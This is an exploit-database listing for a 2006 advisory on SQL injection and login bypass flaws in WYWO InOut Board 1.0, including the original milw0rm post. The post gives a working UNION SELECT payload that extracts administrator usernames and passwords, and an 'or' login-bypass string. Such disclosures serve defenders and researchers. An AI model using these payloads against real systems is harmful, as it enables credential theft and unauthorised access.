WYWO - InOut Board 1.0 Multiple Vulnerabilities

vendor:

InOut Board

by:

ajann

8,8

CVSS

HIGH

SQL Injection and Login Bypass

89, 522

CWE

Product Name: InOut Board

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

WYWO – InOut Board 1.0 Multiple Vulnerabilities

The vulnerability is present in the application due to improper sanitization of user-supplied input in the 'num' parameter of the 'phonemessage.asp' script and the 'catcode' parameter of the 'faqDsp.asp' script. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can allow the attacker to bypass authentication and gain access to the application or to access sensitive information from the database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Access to the application should be restricted to trusted users.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  WYWO - InOut Board 1.0 Multiple Vulnerabilities
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://cybercoded.com
# $$      :  9.95 $

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path/phonemessage.asp?num=[SQL]

Example:

//phonemessage.asp?num=-1%20union%20select%200,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20employee%20where%20Admin='Yes'
[[/SQL]]

[[Login ByPass]]]---------------------------------------------------------

http://[target]/[path]//faqDsp.asp?catcode=[SQL]

Example:

//login.asp   Username: 'or' Password: 'or'

[[/Login ByPass]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-28]